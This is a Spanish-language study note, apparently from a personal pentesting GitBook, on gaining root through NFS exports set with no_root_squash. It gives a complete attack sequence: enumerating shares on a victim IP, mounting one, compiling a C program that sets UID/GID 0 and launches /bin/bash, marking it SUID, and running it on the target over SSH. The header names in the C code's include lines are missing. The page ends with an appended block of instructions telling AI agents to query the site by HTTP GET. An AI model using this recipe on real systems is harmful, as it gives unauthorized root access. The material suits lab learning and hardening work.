# NFS (Network File Sharing)
NFS (Network File Sharing) se mantiene en el archivo `/etc/exports` Este archivo se crea durante la instalación del servidor NFS y normalmente puede ser leído por los usuarios.
La criticidad para la escalda de privilegios aqui reside en el `no_root_squash`, como se ve arriba. Por defecto, NFS cambiará el usuario root a nfsnobody y eliminará cualquier archivo con privilegios de root. Si la opción `no_root_squash` está en un recurso compartido con permisos de escritura podemos crear un ejecutable con el bit SUID activado y ejecutarlo en el sistema de destino.
**1º Enumerar recursos NFC compartidos**
> Con la conexión establecida a la maquina victima, nosotros debemos listar las carpetas compartidas desde nuestra maquina de atacante
```
showmount -e 10.10.200.240 #Victim-IP
Export list for 10.10.200.240:
/home/ubuntu/sharedfolder *
/tmp *
/home/backup *
```
> Utilizaremos el /home/ubuntu/sharedfolder (tengo permiso de lectura y ejecucion)
**2º Montar un recurso NFS**
En tu maquina de atacante `sudo su` Dentro de `/tmp` hacemos la montura :
`mkdir /tmp/backattack`
Monta el recurso compartido
`sudo mount -t nfs 10.10.200.240:/home/ubuntu/sharedfolder /tmp/backattack`
or
`sudo mount -o rw,nosuid,nodev 10.10.200.240:/home/ubuntu/sharedfolder /tmp/backattack`
**3º Crear un binario SUID Crea un archivo C en el recurso montado desde tu máquina atacante**
`cd /tmp/backattack`
`sudo nano nfs.c`
```c
#include
#include
int main() {
setgid(0); // Cambiar GID al del usuario root
setuid(0); // Cambiar UID al del usuario root
system("/bin/bash"); // Lanzar un shell
return 0;
}
```
Compílalo directamente en el recurso compartido
`sudo gcc nfs.c -o nfs -w`
or
`sudo gcc -static -o nfs nfs.c` # X Si da errores
Asigna el bit SUID al binario:
`chmod +s nfs`
Verifica que se haya creado y dado permisos
`ls -l nfs`
**5º Ejecutar el binario en la maquina victima**
Te conectas a la maquina `ssh katcus@10.10.200.240`
Vamos al `/home/ubuntu/sharedfolder` y **ejecutamos el binario SUID**
```
cd /home/ubuntu/sharedfolder
./nfs
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://eldeim.gitbook.io/brain_fuck/notes/linux-hardening/privilege-escalation-linux/nfs-network-file-sharing.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.